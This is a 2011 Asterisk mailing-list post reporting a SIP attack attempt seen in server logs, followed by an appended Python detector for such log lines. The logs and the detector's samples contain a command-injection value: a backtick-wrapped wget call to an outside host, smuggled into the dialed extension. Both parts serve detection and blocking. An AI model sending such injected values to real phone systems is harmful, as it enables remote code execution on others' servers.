[asterisk-users] new sort of shell attack attempt via SIP?

Saqib Butt saqib at binarium.ca
Mon Sep 12 16:02:22 CDT 2011


I have seen this recently in my logs as well.

[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp("SIP/5060-0000002c", "Received incoming SIP connection from unknown peer to 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack 
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:2] Set("SIP/5060-0000002c", "DID=00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack 
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:3] Goto("SIP/5060-0000002c", "s,1") in new stack 
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,s,1) 
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s@from-sip-external:1] GotoIf("SIP/5060-0000002c", "0?from-trunk,00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`,1") in new stack 
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,//91.223.89.94/V.php`,1) 

So can this be blocked via fail2ban and by adding a new REGEX?


Thanks 

Saqib 
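
Added example, not part of the original post: a detector for the pattern in the log lines above, flagging any dialed extension that contains characters outside a normal dial string and then checking whether the lines hold a sender address at all. A fail2ban failregex needs a `<HOST>` to act on, and the lines shown carry only the channel name. The allowed character set, the function names and the sample lines (with the documentation address 192.0.2.10) are assumptions made for this illustration.

```python
import re

# Asterisk verbose line: -- Executing [exten@context:priority] App("channel", ...
EXEC_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\]\s+VERBOSE\[\d+\]\s+\S+\s+--\s+Executing\s+'
    r'\[(?P<exten>.+?)@(?P<context>[\w.-]+):(?P<prio>\d+)\]\s+\w+\("(?P<channel>[^"]*)"')
# Assumption: legitimate extensions on this system use only these characters.
ALLOWED_EXTEN = re.compile(r'^[0-9A-Za-z*#+_.-]+$')
SHELL_META = re.compile(r'[`$;|&<>(){}\\\s]')
IPV4 = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

# Constructed sample modelled on the log lines above; 192.0.2.10 is a documentation address.
SAMPLE = r'''
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://192.0.2.10/V.php`@from-sip-external:1] NoOp("SIP/5060-0000002c", "constructed") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://192.0.2.10/V.php`@from-sip-external:2] Set("SIP/5060-0000002c", "DID=constructed") in new stack
[2011-09-10 20:35:01] VERBOSE[14940] logger.c: -- Executing [5551234@from-sip-external:1] NoOp("SIP/5060-0000002d", "constructed") in new stack
'''.strip().splitlines()

def suspicious_extensions(lines):
    """One finding per distinct (channel, exten) whose extension is outside ALLOWED_EXTEN."""
    seen, findings = set(), []
    for line in lines:
        m = EXEC_RE.match(line)
        if not m or ALLOWED_EXTEN.match(m['exten']):
            continue
        key = (m['channel'], m['exten'])
        if key not in seen:
            seen.add(key)
            findings.append({'timestamp': m['ts'], 'channel': m['channel'],
                             'context': m['context'], 'exten': m['exten'],
                             'shell_meta': sorted(set(SHELL_META.findall(m['exten'])))})
    return findings

def source_addresses(lines, findings):
    """IPv4 addresses left in the lines once the dialed strings are removed (ban candidates)."""
    found = set()
    for line in lines:
        for f in findings:
            line = line.replace(f['exten'], '')
        found.update(IPV4.findall(line))
    return sorted(found)

if __name__ == '__main__':
    hits = suspicious_extensions(SAMPLE)
    for h in hits:
        print(h['timestamp'], h['channel'], h['context'], repr(h['exten']), h['shell_meta'])
    print('addresses usable for a ban:', source_addresses(SAMPLE, hits))
```

The empty address list is the practical answer for these particular lines: the only IP in them sits inside the dialed string, so a ban rule has to match on a log line that records the remote peer.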

